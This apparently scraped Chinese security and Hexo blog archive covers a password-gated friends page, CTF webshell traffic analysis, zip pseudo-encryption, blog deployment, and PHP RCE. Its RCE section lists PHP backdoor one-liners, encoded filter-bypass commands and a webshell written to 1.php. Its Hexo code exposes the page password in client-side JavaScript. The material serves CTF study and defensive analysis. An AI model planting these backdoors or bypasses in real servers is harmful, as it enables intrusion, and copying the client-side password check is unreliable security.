url_for(theme.error_img.post_page) + `'` alt='cover' )                      .info                    if theme.lazyload.enable                      img.cf-friends-avatar.no-lightbox.flink-avatar(data-lazy-src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                    else                      img.cf-friends-avatar.no-lightbox(src=url_for(item.avatar) cf-src=url_for(item.avatar) onerror=`this.onerror=null;this.src='` + url_for(theme.error_img.flink) + `'` alt='cover' )                    span.flink-sitename.cf-friends-name= item.name    != page.contentif page.password  script.    function decryptFriends() {      const inputPass = document.getElementById('hbePass').value;      const correctPass = '#{page.password}';      const encryptedContent = document.getElementById('encrypted-content');      const errorElement = document.getElementById('hbeError');      const encryptContainer = document.getElementById('hexo-blog-encrypt');            if (inputPass === correctPass) {        encryptedContent.style.display = 'block';        encryptContainer.style.display = 'none';        errorElement.style.display = 'none';        localStorage.setItem('friends-page-pass', inputPass);      } else {        errorElement.style.display = 'block';      }    }    document.addEventListener('DOMContentLoaded', function() {      const savedPass = localStorage.getItem('friends-page-pass');      if (savedPass === '#{page.password}') {        document.getElementById('encrypted-content').style.display = 'block';        document.getElementById('hexo-blog-encrypt').style.display = 'none';      }    });

在你创建友链页面而生成的\source\link\index.md文件的Front-matter部分，添加以下参数：

password: your_password # 设置你的访问密码message: 请输入密码查看友链wrong_pass_message: 密码错误，请重试！abstract: 这里是加密的友链页面，只有知道密码的朋友才能看到哦~

创建CSS样式并引入配置文件进行美化：

/* 加密界面样式 */#hexo-blog-encrypt {  background: var(--anzhiyu-card-bg);  border: var(--style-border);  border-radius: 12px;  padding: 3rem 2rem;  margin: 2rem 0;  box-shadow: var(--anzhiyu-shadow-border);  text-align: center;}.hbe-input-container {  margin-bottom: 1rem;}#hbePass {  padding: 10px 15px;  border: var(--style-border);  border-radius: 8px;  width: 200px;  margin-right: 10px;  background: var(--anzhiyu-background);  color: var(--anzhiyu-fontcolor);}#hexo-blog-encrypt button {  padding: 10px 20px;  background: var(--anzhiyu-theme);  color: var(--anzhiyu-white);  border: none;  border-radius: 8px;  cursor: pointer;  transition: all 0.3s;}#hexo-blog-encrypt button:hover {  background: var(--anzhiyu-theme);  transform: translateY(-2px);  box-shadow: var(--anzhiyu-shadow-theme);}

完成后进行hexo 三连即可应用

附：该功能初步实现，如有隐藏bug或安全漏洞请联系，感激不尽
注：本功能与文章加密插件不兼容

Webshell流量深入理解

2025-11-01T16:00:00.000Z

Webshell流量深入理解

Webshell流量，指的是攻击者在已经获取一个Web服务器的部分权限后，通过上传的Webshell后门脚本与服务器进行交互时，所产生的网络通信数据。

首先，攻击者通过漏洞（如文件上传漏洞、命令注入漏洞等）将一个Webshell脚本文件（如 shell.php、backdoor.jsp）放到了网站的目录下。这个Webshell脚本就是一个驻留在服务器上的后门。

攻击者通过客户端（专用连接工具）向这个Webshell脚本发送命令，服务器就可以执行攻击者想要执行的命令。

简单来说：

Webshell流量 = 攻击者通过Web后门（Webshell）远程控制服务器时，产生的“指令”和“结果”数据流。

通过分析webshell流量，就可以知道攻击者的意图和攻击手法

一般CTF中，根据客户端连接工具的不同，常见的流量有：菜刀，蚁剑，冰蝎，哥斯拉，CobalStrike（CS流量）等。

菜刀流量

中国菜刀

https://github.com/raddyfiy/caidao-official-version

中国菜刀是一款功能强大的webshell工具，可以用来获取目标网站的文件系统，获取目标的shell进行命令执行操作，进行数据库操作等。常见版本有三个：

分别为2011版，2014版，2016版

流量特征

菜刀流量通常即指使用菜刀工具所产生的webshell流量

流量特征一般为：

请求体：通常是base64加密过再URL编码后的数据
利用方式：主要是eval函数
响应体：通常数据被包含在->| |<-符号中，这是菜刀最显著的一个特征

例题

buuctf:菜刀666

打开流量包追踪流：

可以发现，在请求内容里，主要利用的是eval函数/assert函数，所有参数都经过base64编码，使用base64_decode函数。而响应内容是带 ->| |<-分隔符的

其次，如果多看几个流量，还会发现参数名上也有一些特征：参数名通常是命名为z1、z2、z3……通常 z0用于设置环境变量、z1为密码、z2为执行的命令。

这些就是菜刀流量的特征了，由于只是base64编码内容或直接呈现明文，因此流量分析过程简单。

以上题为例，追踪流很容易发现传输的文件：

提取出图片后得到key，再解密foremost提取出的压缩包，即可得到flag

蚁剑流量

蚁剑

中国蚁剑（AntSword）是一款开源、跨平台的 WebShell 管理工具，支持 PHP、ASP、ASPX、JSP 等常见脚本语言。它是渗透测试人员和安全研究员常用的 Web 持久化控制平台之一，主要用于管理目标服务器上的 WebShell，实现文件管理、命令执行、数据库操作等功能。

流量特征

还是先介绍一下特征，以便我们如何得知这是一个蚁剑流量：

编解码器：

相比菜刀使用明文/弱编码（Base64），使用固定分隔符|<-，极易被waf拦截，蚁剑主要改进的功能是编码解码器。

蚁剑的编码解码器是蚁剑中用于加密和解密与服务器通信数据的组件，它能将蚁剑发送的请求和接收的响应数据进行混淆（如Base64、rot13、自定义算法等），以绕过WAF等安全防护，实现隐蔽的命令执行和数据传输。编码器处理发往服务器的流量，而解码器处理从服务器返回的流量。

蚁剑的默认编码/解码器：

一. default

选择编/解码器选着default时，不对传输的Payload进行任何操作。

这里我搭建了一个文件上传靶场，传入一句话木马并抓取蚁剑的连接流量：

因为蚁剑是http 协议post请求，对http数据流进行追踪，可以找到数据交互的过程。

可以发现payload只进行了URL编码，可以使用工具轻松解码：

同时，我们也看到了一些特征：

蚁剑带了明显的特征函数@ini_set(“display_errors”，”0”)；
在响应的回显结果中，发现前后各有一串随机字符串（这是蚁剑为了对抗安全检测而设计的混淆手段）

二. base64编码器

请求响应流量如下：

可以发现，当选择编/解码器选着base64时，蚁剑会将payload经过base64编码再经过URL编码后赋值给一个随机字符串。

然后将这个随机字符串的值通过POST方法传入eval函数再base64解码，通过eval函数执行。

其余的特征不变，包括响应值中依旧前后会有随机的字符串：

三. chr编码器

请求响应流量如下：

可以发现，当编码器选择chr的时候，蚁剑会对payload的所有字符都利用利用chr函数进行转换，其余的特征均相同

四. php RSA编码器

配置rsa编码器：

生成rsa密钥和php代码：

其中php代码：

接着新建一个php rsa编码器：

/** * php::RSA编码器 * Create at: 2026/01/27 13:13:41 */'use strict';/* * @param  {String} pwd   连接密码 * @param  {Array}  data  编码器处理前的 payload 数组 * @return {Array}  data  编码器处理后的 payload 数组 */module.exports = (pwd, data, ext={}) => {    let n = Math.ceil(data['_'].length / 80);    let l = Math.ceil(data['_'].length / n);    let r = []    for (var i = 0; n > i; i++) {        r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));    }    data[pwd] = r.join("|");    delete data['_'];    return data;}

分析编码器，可以发现：

主要逻辑是将原始 payload 分割成多个块，分别使用 RSA 私钥加密，然后将加密结果用 “|” 连接起来。

pwd: 连接密码，用于指定加密后数据存放的键名
data: 包含原始 payload 的对象
ext: 扩展对象，包含 RSA 加密器（ext['rsa']）

测试传shell并捕获流量：

首先分析发现，在POST请求中有多个参数：

其中有一个固定的参数是ant

它的值是通过上述的rsa进行加密的：

可以使用公钥进行解密：

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.6fa00ad71f1b";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$igetMessage();};asoutput();die();

`四. 其它`

chr16编码器：对payload的所有字符都利用chr函数转换，但是对chr函数传递的参数是十六进制。
rot13编码器：对payload中的字母进行rot13转换。

`冰蝎流量`

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端，冰蝎当中 shell 是通过传输协议配置的

可以看到有以下协议：

`通信流程`

冰蝎 4.0 通信流程如下：

密钥协商

1、攻击者首先通过GET或者POST传参的方法对服务器请求密钥,譬如：http://127.0.0.1/webshell.aspx?password=62、服务器使用生成的随机数的MD5值的前十六位当作密钥K并且存储在全局变量$_SESSION中，并且发给攻击者

加密传输

1、攻击者得到了密钥K，将K作为密钥进行AES128或者异或加密加密手法将执行命令发送到服务段2、服务端得到密文之后使用K进行解密3、将得到的执行结果使用K进行AES加密之后传回攻击者

`传输协议`

以default_aes为例：

选择生成服务端，即可自动生成多种shell:

上传到目标靶机，然后在客户端中选择新建链接，填好url链接即可连接成功



深入理解zip伪加密
2025-10-30T16:00:00.000Z
深入理解zip伪加密
前言: 之前一直认为,zip的伪加密也就是判断奇偶，改一改加密标志位那么简单,甚至可以直接上手拿工具去梭,感谢经过C3ngH师傅指正后,才意识到其中原理的重要性. 对其深入研究后, 记录下这篇文章。
zip伪加密原理
了解伪加密之前，我们需要深入理解zip的文件结构。
一个zip通常由三部分组成，即： 压缩源文件数据区  压缩源文件目录区  压缩源文件目录结束标志
如图：
压缩源文件数据区：
HEX 含义
50 4B 03 04 这是zip的头文件标记（0x04034b50），对应文本PK
14 00 解压文件所需的 pkware 版本
00 00 全局方式位标记（有无加密）
08 00 压缩方式 （0x0008，对应Deflated）
AA 84 最后修改文件时间 （遵循MS-DOS时间格式）
5F 5B 最后修改文件日期 （遵循MS-DOS时间格式）
6A B1 EC C9 CRC-32校验和（0xC9ECB16A）
19 00 00 00 压缩后尺寸
18 00 00 00 未压缩尺寸
08 00 文件名长度
00 00 扩展记录长度
66 6C 61 67 2E 74 78 74 文件名（对应flag.txt）
压缩源文件目录区
HEX 含义
50 4B 01 02 目录中文件文件头标记
1F 00 压缩使用的 pkware 版本
14 00 解压文件所需 pkware 版本
00 00 全局方式位标记（有无加密）
08 00 压缩方式
AA 84 最后修改文件时间
5F 5B 最后修改文件日期
6A B1 EC C9 CRC-32校验和
16 00 00 00 压缩后尺寸
18 00 00 00 未压缩尺寸
08 00 文件名长度
24 00 扩展字段长度
00 00 文件注释长度（0 字节，表示没有注释）
00 00 磁盘开始号（0，表示文件不跨磁盘）
00 00 内部文件属性
20 00 00 00 外部文件属性
00 00 00 00 局部头部偏移量
66 6C 61 67 2E 74 78 74 文件名（对应flag.txt）
0A 00 20 00 … DC 01 扩展字段（长度为36字节，这是由上面的扩展字段长度24 00决定的。这是ZIP64、NTFS时间戳等扩展信息的存放位置）
压缩源文件目录结束标志
HEX 含义
50 4B 05 06 目录结束标记
00 00 当前磁盘编号（因为该ZIP文件没有分卷，不跨越多张磁盘，所以从0开始）
00 00 目录区开始磁盘编号 （同上，表示中央目录也位于第一个磁盘上）
01 00 本磁盘上纪录总数 （表示当前磁盘上有1条中央目录记录）
01 00 目录区中纪录总数 （这是整个ZIP文件中最重要的计数之一，它表明这个ZIP文件中总共包含1个文件）
5A 00 00 00 目录区尺寸大小 （十进制90字节。这指的是从50 4B 01 02开始到中央目录记录结束的所有字节长度）
3C 00 00 00 目录区对第一张磁盘的偏移量 （中央目录相对于存档起始位置的偏移量。小端序，0x0000003C = 十进制 60 字节。这意味着，解压软件需要从ZIP文件开头跳过60个字节，就能找到中央目录（即 PK\x01\x02 签名）
00 00 ZIP 文件注释长度（0表示ZIP文件没有全局注释）
无 ZIP文件注释内容（因为注释长度为0，所以这里没有数据）
伪加密原理
在一个正常、健康的ZIP文件中，对于同一个文件条目，其压缩源文件数据区和压缩源文件目录区中的“全局方式位标记”（即加密标志）必须完全一致。
如：
而解压软件处理ZIP文件通常分两步：
步骤一：列出文件列表
软件首先读取ZIP文件末尾的中央目录（目录区），这里包含了所有文件的索引信息（文件名、加密标志等），软件根据这里的信息向用户展示文件列表，并给加密文件打上“*”的图标。
步骤二：解压具体文件
当用户选择解压一个文件时，软件根据中央目录记录的指针，找到文件对应的本地文件头（数据区），软件依据数据区中的标志位来执行实际的解压操作。
伪加密，则是在一个正常未加密的zip文件上进行修改：将压缩源文件目录区的全局方式位标记改为加密的状态，这样，压缩软件首先读取目录区，就会认为“这是一个加密文件”，从而向用户索要密码。（但实际上，文件根本没有加密，这也是“伪加密”叫法的由来。）
例如：
这里将00 00改为09 00，压缩软件就会显示加密：
经过实测，7-Zip检测的是数据区的全局方式位标记，其他解压软件，例如BandZip和WinRAR检测目录区的全局方式位标记，这三种软件都只检测一位，并不会检测另一个位置，同时也不会进行报错。
你可能会好奇，为什么这里非得改成09而不是其它数字呢？
这与压缩软件判断通过全局方式位标记判定加密的逻辑有关：
全局方式位标记是一个16位的二进制数（在ZIP文件中以2个字节表示），在这16个位中，最低位（Least Significant Bit, 也称之为第0位）是加密的总开关。
在ZIP文件中，这2个字节是小端序存储的。例如，你看到 00 00，实际值应为 0x0000。
对应的二进制数为：0000 0000 0000 0000，最低位为0，因此判定为未加密，压缩软件会直接解压。
而09 00，对应二进制数：0000 0000 0000 1001，最低位为1，因此会判定为加密。
不同的加密算法也具有不同的详细特征：
加密算法 全局方式位标记 (二进制) 典型十六进制值 原理与特点
未加密 xxxx xxxx xxxx xxx0 00 00, 08 00 第0位 = 0。总开关关闭，文件未加密。
PKWARE 传统加密 xxxx xxxx xxxx xxx1 01 00, 09 00 第0位 = 1，且第6位和第11位均为0。这是ZIP格式最初定义的弱加密算法。
AES 加密 xxxx xxx1 xxxx 1xx1 01 09, 01 41, 01 63 第0位=1（加密），且第6位=1，第11位=1。这是WinZip开发并标准化的强加密。
但是总的来说，不管哪种加密，第0位都是决定加密的总开关，当第0位为0时，对应的十六进制值为偶数值，当第0为为1时，对应的十六进制值为奇数值，因此，我们才有了通过判定奇偶值来判断加密的说法。
解题思路
在CTF 比赛题目中，涉及到伪加密类型，我们需要同时分析zip的压缩源文件数据区和压缩源文件目录区，判定其是否为伪加密，再通过修改目录区的全局方式位标记来破解伪加密。


基于hexo框架的博客搭建教程
2025-05-19T16:00:00.000Z
基于hexo框架的博客搭建教程
Introduction:  从零到一，搭建一个属于你自己的个人网站！
文章参考：安知鱼 ，桃子，MortalCat，唐志远
1. 环境准备
演示操作系统：windows11 专业版
需要的环境：
git：https://git-scm.com/downloads
Nodejs：https://nodejs.org/zh-cn/download/
Hexo：见下文
GitHub 账号（https://github.com/ 需要自行注册 ps: 学会科学上网） / 云服务器（特别注意： 中国内地服务器需要备案）
VScode：https://code.visualstudio.com/download
各种环境的安装教程自行上网查找
注：
Nodojs安装好后，最好需要更换npm源(npm默认源为国外，下载速度较慢，可能引起部分依赖无法安装问题)
换源：
npm config set registry https://registry.npmmirror.com/
2. 安装Hexo
安装好git和Nodejs后，在终端执行：
npm install -g hexo-cli
hexo -v 验证安装，成功会输出版本信息
3. 初始化项目
选择一个路径，这个路径即你博客之后所有本地文件所放的路径。建议在系统盘之外。
使用hexo init来初始化项目：
hexo init example
进入项目文件夹后打开终端，安装依赖：
npm -i
此时整个项目初始化完毕：
你的项目应包含以下结构：
【node_modules】：依赖包
【scaffolds】：生成文章的一些模板
【source】：用来存放你的文章
【themes】：主题
【_config.landscape.yml】：默认主题的配置文件
【config.yml】：网站的配置文件
【package-lock.json】：项目名称、描述、版本、运行和开发等信息
此时，你已经成功拥有一个个人网页了！
如何打开？
需要常说的hexo三连
即以下命令：
hexo clean && hexo generate && hexo server  // Git BASH终端hexo clean; hexo generate; hexo server  // VSCODE终端
或者简写为：
hexo cl && hexo g && hexo s  // Git BASH终端hexo cl; hexo g; hexo s  // VSCODE终端
成功应看到以下信息：
其代表你的网站服务在本地的4000端口开放（前提保证你的4000端口不被其他服务占用，如被占用可手动指定其他端口打开 例如：-p 5000）
访问http://localhost:4000 或 http://127.0.0.1:4000 就可以看到你的网页了！
当然，网页中各种文字，描述，标题，图片等等都是可以改的，具体将在后文介绍
4. 上传至github/云服务器
你的网页目前只能在本地运行，也就是说，别人是无法访问的。
那么，如何像真正的网站那样，通过一个链接实现所有人都能访问呢？
你需要将你的网站推送到与公网连接的服务器上。
这里有两种方案：（以下配置方案二选一即可）
一. github pages
**优点：**完全免费的服务，免费生成的域名，操作方便
**缺点：**网站的访问速度较慢，部分资源很难加载，可能需要科学上网才能访问到你的网页
以下以github pages为例进行上传：
配置git，创建仓库，连接到github
第一步：注册github账号（需要科学上网）
https://github.com/
第二步： 注册完成后，点击右上角的+按钮，选择New repository，创建一个<用户名>.github.io的仓库。
配置如下：
注意：格式必须为xxx.github.io！且必须选择Public！
第三步： 需要配置好git用户名和邮箱：
git config --global user.name "your-username"git config --global user.email "your-email"
通过git config -l 检查是否配置成功
第四步： 连接到github
执行以下命令生成ssh公钥：
ssh-keygen -t rsa -C "your-email"
之后打开C盘下用户文件夹下的.ssh的文件夹，会看到 id_rsa.pub
用记事本打开上述图片中的公钥（id_rsa.pub），复制里面的内容。
进入github，点击右上角头像 选择settings，进入设置页后选择 SSH and GPG keys，名字随便起，公钥填到Key那一栏。
测试连接：
ssh -T git@github.com
成功信息：
将网站上传到github
首先需要安装依赖：
进入本地博客网站的目录后，运行如下命令：
npm install hexo-deployer-git --save
之后打开目录下的_config.yml，这是整个Hexo框架的配置文件，里面可以修改网站的各种配置。
找到deploy配置：
将repository修改为你自己的github项目地址即可，还有分支要改为main代表主分支
例如：
deploy:  type: git  repository: git@github.com:Mitunlny/example.github.io.git  branch: main
配置保存后，运行hexo三连上传：
hexo clean && hexo generate && hexo deploy  // Git BASH终端hexo clean; hexo generate; hexo deploy  // VSCODE终端
简写为：
hexo cl && hexo g && hexo d  // Git BASH终端hexo cl; hexo g; hexo d  // VSCODE终端
如果出现Deploy done，则说明部署成功了。
此时进入你的项目，可以看到有多出的文件了：
此时点击上方settings:
在pages这里修改分支为main
等待出现上方的Visit site，就说明上传成功了，可以通过网址访问了
二. 云服务器
**优点：**内地访问速度快
**缺点：**云服务器需要付费，需要额外购买域名，且需要进行备案（港澳台除外）
配置教程：
首先你需要有一台云服务器（Linux系统）实例，这里以基于Debian 发行版的Ubuntu 22.04为例
对于个人博客，建议使用1核CPU、1GB内存、20GB存储及以上配置的轻量级配置；带宽适量提高
本地端环境配置
见上文，初始化项目结束，可以通过localhost访问即可。
服务端环境配置
前置：
开放服务器常用端口，配置好防火墙或安全组等
访问服务器终端进行环境配置
1. 安装git和nginx
更新软件包：
sudo apt update
安装Nginx:
sudo apt -y install nginx git
验证：
nginx -v
启动nginx服务：
systemctl enable nginx.servicesystemctl start nginx.service
查看状态：
systemctl status nginx.service
如果显示active，那么就代表安装成功了。
2. 配置git仓库和HOOK
创建git用户：
#创建用户,用户名为gitadduser git#设置密码passwd git
把git用户添加到sudo用户组中:
输入sudo vi /etc/sudoers，打开sudoers文件
到代码行root ALL=(ALL) ALL,然后在这一行下添加以下代码git ALL=(ALL) ALL。
输入完毕之后，按wq!强制保存退出vi。
切换到git用户，添加SSH Key文件并且设置相应的读写与执行权限：
# 切换用户su git# 创建目录mkdir ~/.ssh# 新建文件vim ~/.ssh/authorized_keys
然后把之前在客户端设置的SSH Key,复制到authorized_keys文件中，保存后退出。
配置权限：
chmod 600 ~/.ssh/authorized_keyschmod 700 ~/.ssh
创建一个新的文件夹，用于存放git仓库：
mkdir /home/git/
修改权限：
chown -R $USER:$USER /home/git/chmod -R 755 /home/git/
创建git仓库：
cd /home/git/git init --bare blog.git
 创建hook:
vim ~/blog.git/hooks/post-receive
输入以下内容：
git --work-tree=/home/www/blog --git-dir=/home/git/blog.git checkout -f
# 在john.git/hooks文件夹下，修改post-receive文件权限，使其能够被正常执行chmod +x post-receive
在本地的网站配置文件中配置如下：
deploy:  type: git  repo: git@公网IP:/home/git/blog.git  branch: master
再运行hexo cl; hexo g; hexo d即可部署到服务器上
3. 配置nginx环境
创建托管地址：
mkdir -p /home/www/blogchown -R $USER:$USER /home/www/blogchmod -R 755 /home/www/blog
这是之后博客网页文件的上传地址
之后找到nginx的配置文件（nginx.conf）
一般位于/etc/nginx，也可以用nginx -t来查找：
修改配置文件中的server项：
server {        listen       80;        server_name  example.com;             #域名……        location / {            root   /home/www/blog;            index  index.html index.htm;        }}
主要是修改server_name与root，server_name修改为域名，没有域名就不用修改了，root就是blog静态资源文件目录。
然后重启nginx服务：
sudo systemctl restart nginx.service
5. 自定义域名
首先你需要去搜索你想要的域名去购买一个
在各大云厂商都可以购买（阿里云/腾讯云/百度云……）
之后就可以进行域名的解析了
推荐这篇文章：https://www.cnblogs.com/luoweifu/p/18361568
例如：连接域名到github：
即添加CNAME记录，将你的域名指向github给你分配的域名。
6. 网站页面修改和主题美化
默认的hexo页面非常简介而且不美观，因此想要让自己的博客变得好看起来，我们可以使用自定义的主题！
一.  主题配置
hexo有很多种主题，可以到官网去下载或者在线预览各种主题样式的网页：http://hexo.io
下载并应用主题：
这里以butterfly主题为例：
使用npm安装（也可以如上，从官网搜索该主题并安装）
npm i hexo-theme-butterfly
修改网站的配置文件，将主题theme改为butterfly:
安装依赖：
npm install hexo-renderer-pug hexo-renderer-stylus --save
重新hexo三连，可以看到网页已经切换了主题：
基础信息配置：
我们可以看到，现在标题还是Hexo，而且我们的头像，昵称什么的也不对，因此我们需要去配置文件中修改。
注意！网页配置文件和主题配置文件的区别：
本文中，所指的网页配置文件指的是_config.yml
而主题配置文件，指的是_config.landscape.yml或_config.butterfly.yml
这里，如果是通过npm安装的，我们的_config.butterfly.yml会在这个位置：
……\node_modules\hexo-theme-butterfly\_config.yml
我们可以将这个文件复制一份到根目录，并重命名为：_config.butterfly.yml
这样方便编辑，且hexo默认第一优先使用的是这里复制的文件。
接下来，我们就可以编辑配置文件了！
_config.yml 网站配置文件：
Site项：
# Sitetitle: Hexosubtitle: ''description: ''keywords:author: mitulanguage: entimezone: ''
项目 内容
title 网站的标题
subtitle 副标题
description 页面描述
keywords 页面关键字
author 你的名字
language 网站使用的语言（zh-CN）
timezone 网站时区（Asia/Shanghai）
URL：填写成你自己的域名即可
_config.butterfly.yml 网站配置文件：
menu项：网站的菜单，指向你的每一个页面，需要去掉注释。
例如：
code_blocks项：代码块的主题，风格调整
code_blocks:  # Code block theme: darker / pale night / light / ocean / false  theme: light  macStyle: true  # Code block height limit (unit: px)  height_limit: 200  word_wrap: false
social项： 填写自己的联系方式
social:  fab fa-github: https://xxxxxx/xxxxxx || Github || '#24292e'  fas fa-envelope: mailto:xxxxxx@qq.com || Email || '#4a7dbe'
avatar: 网站图标和头像
favicon:avatar:  img:  effect: false
banner images： 网站各个地方的banners图片(具体看自己应用)
# Disable all banner imagesdisable_top_img:# If the banner of page not setting, it will show the default_top_imgdefault_top_img:# The banner image of index pageindex_img:# The banner image of archive pagearchive_img:# Note: tag page, not tags pagetag_img:# The banner image of tag page, you can set the banner image for each tag# Format:#  - tag name: xxxxxtag_per_img:# Note: category page, not categories pagecategory_img:# The banner image of category page, you can set the banner image for each category# Format:#  - category name: xxxxxcategory_per_img:# The background image of footerfooter_img:
background项：网站的背景图片
background:   - background.png


PHP-RCE
2025-04-13T16:00:00.000Z
PHP-RCE
参考文章：
https://www.cnblogs.com/tomyyyyy/p/13905357.html
https://blog.csdn.net/2302_76827504/article/details/130427099
https://developer.aliyun.com/article/1224913
https://blog.csdn.net/qq_45392044/article/details/145836455
https://www.cnblogs.com/chir/p/13420148.html
PHP RCE 基础
一、RCE漏洞概述
什么是RCE——基本概念
远程代码/命令执行漏洞（Remote Code/Command Execute，简称RCE）是Web安全领域中危害性极高的漏洞类型，主要分为两类：
代码执行漏洞：针对后端编程语言（如PHP、Java、Python等）的漏洞
命令执行漏洞：针对操作系统层面的漏洞
本篇仅涉及PHP的代码执行漏洞
RCE漏洞成因
当开发人员为了实现功能灵活性，在代码中调用动态执行函数时，若未对用户输入进行严格过滤，攻击者就可以构造恶意输入执行任意代码或系统命令。这种漏洞通常出现在以下场景：
使用字符串转代码函数（如eval()）
调用系统命令函数（如system()）
动态包含文件功能
模板引擎解析
二、相关函数
命令执行
system()
#string system ( string $command [, int &$return_var ] )#system()函数执行有回显，将执行结果输出到页面上
exec()
popen()
#resource popen ( string $command , string $mode )#函数需要两个参数，一个是执行的命令command，另外一个是指针文件的连接模式mode，有r和w代表读#和写。函数不会直接返回执行结果，而是返回一个文件指针，但是命令已经执行> c:/1.txt', 'r' ); ?> 
proc_open()
resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] )#与Popen函数类似，但是可以提供双向管道 
passthru()
#void passthru ( string $command [, int &$return_var ] )
shell_exec()
#string shell_exec( string &command)
反引号 `
#shell_exec() 函数实际上仅是反撇号 (`) 操作符的变体，当禁用shell_exec时，` 也不可执行
pcntl_exec()
#void pcntl_exec ( string $path [, array $args [, array $envs ]] )#path是可执行二进制文件路径或一个在文件第一行指定了 一个可执行文件路径标头的脚本#args是一个要传递给程序的参数的字符串数组。#pcntl是linux下的一个扩展，需要额外安装，可以支持 php 的多线程操作。#pcntl_exec函数的作用是在当前进程空间执行指定程序，版本要求：PHP > 4.2.0
代码注入
eval()
#传入的参数必须为PHP代码，既需要以分号结尾。#命令执行：cmd=system(whoami);#菜刀连接密码：cmd
assert()
#assert函数是直接将传入的参数当成PHP代码直接，不需要以分号结尾，当然你加上也可以。#命令执行：cmd=system(whoami)#菜刀连接密码：cmd
preg_replace()
#preg_replace('正则规则','替换字符'，'目标字符')#执行命令和上传文件参考assert函数(不需要加分号)。#将目标字符中符合正则规则的字符替换为替换字符，此时如果正则规则中使用/e修饰符，则存在代码执行漏洞。preg_replace("/test/e",$_POST["cmd"],"jutst test");
create_function()
#创建匿名函数执行代码#执行命令和上传文件参考eval函数(必须加分号)。#菜刀连接密码：cmd$func =create_function('',$_POST['cmd']);$func();
array_map()
#array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。#命令执行http://localhost/123.php?func=system   cmd=whoami#菜刀连接http://localhost/123.php?func=assert   密码：cmd$func=$_GET['func'];$cmd=$_POST['cmd'];$array[0]=$cmd;$new_array=array_map($func,$array);echo $new_array;
call_user_func()
#传入的参数作为assert函数的参数#cmd=system(whoami)#菜刀连接密码：cmdcall_user_func("assert",$_POST['cmd']);
call_user_func_array()
#将传入的参数作为数组的第一个值传递给assert函数#cmd=system(whoami)#菜刀连接密码：cmd$cmd=$_POST['cmd'];$array[0]=$cmd;call_user_func_array("assert",$array);
array_filter()
#用回调函数过滤数组中的元素：array_filter(数组,函数)#命令执行func=system&cmd=whoami#菜刀连接http://localhost/123.php?func=assert  密码cmd$cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);
uasort()
#php环境>=<5.6才能用#uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。#命令执行：http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);#菜刀连接：http://localhost/123.php?1=1+1&2=eval($_POST[cmd])   密码：cmdusort($_GET,'asse'.'rt');
三、例题
https://www.nssctf.cn/problem/424
https://www.nssctf.cn/problem/383
https://www.nssctf.cn/problem/425
https://www.nssctf.cn/problem/3090
四、绕过方式
空格
#常见的绕过符号有：$IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、<、#$IFS在linux下表示分隔符，如果不加{}则bash会将IFS解释为一个变量名，加一个{}就固定了变量名，$IFS$9后面之所以加个$是为了起到截断的作用
命令分隔符
%0a  #换行符，需要php环境%0d  #回车符，需要php环境;    #在 shell 中，是”连续指令”&    #不管第一条命令成功与否，都会执行第二条命令&&   #第一条命令成功，第二条才会执行|    #第一条命令的结果，作为第二条命令的输入||   #第一条命令失败，第二条才会执行
关键字
假如过滤了关键字cat\flag，无法读取不了flag.php，又该如何去做
拼接绕过
#执行ls命令：a=l;b=s;$a$b#cat flag文件内容：a=c;b=at;c=f;d=lag;$a$b ${c}${d}#cat test文件内容a="ccaatt";b=${a:0:1}${a:2:1}${a:4:1};$b test
编码绕过
#base64echo "Y2F0IC9mbGFn"|base64 -d|bash  ==> cat /flagecho Y2F0IC9mbGFn|base64 -d|sh      ==> cat /flag#hexecho "0x636174202f666c6167" | xxd -r -p|bash   ==> cat /flag#oct/字节$(printf "\154\163") ==>ls$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag#i也可以通过这种方式写马#内容为${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php
单引号和双引号绕过
c'a't testc"a"t test
反斜杠绕过
ca\t test
通过$PATH绕过
#echo $PATH 显示当前PATH环境变量，该变量的值由一系列以冒号分隔的目录名组成#当执行程序时，shell自动跟据PATH变量的值去搜索该程序#shell在搜索时先搜索PATH环境变量中的第一个目录，没找到再接着搜索，如果找到则执行它，不会再继续搜索echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`echo $PATH| cut -c 8,9`t test
通配符绕过
[…]表示匹配方括号之中的任意一个字符
{…}表示匹配大括号里面的所有模式，模式之间使用逗号分隔。
{…}与[…]有一个重要的区别，当匹配的文件不存在，[…]会失去模式的功能，变成一个单纯的字符串，而{…}依然可以展开
cat t?stcat te*cat t[a-z]stcat t{a,b,c,d,e,f}st
PHP RCE 进阶技巧
例题
https://www.nssctf.cn/problem/439
https://www.nssctf.cn/problem/467
https://www.nssctf.cn/problem/1095
https://ctf.xidian.edu.cn/training/19?challenge=779
一、无字母数字RCE
技术原理与背景
无字母数字RCE是指在不使用任何字母(a-z,A-Z)和数字(0-9)的情况下实现代码执行的技巧。这种技术在以下场景特别有用：
过滤了所有字母和数字的CTF题目
严格的WAF规则过滤了常规payload
需要绕过字符限制的实战环境
例如：
思路：
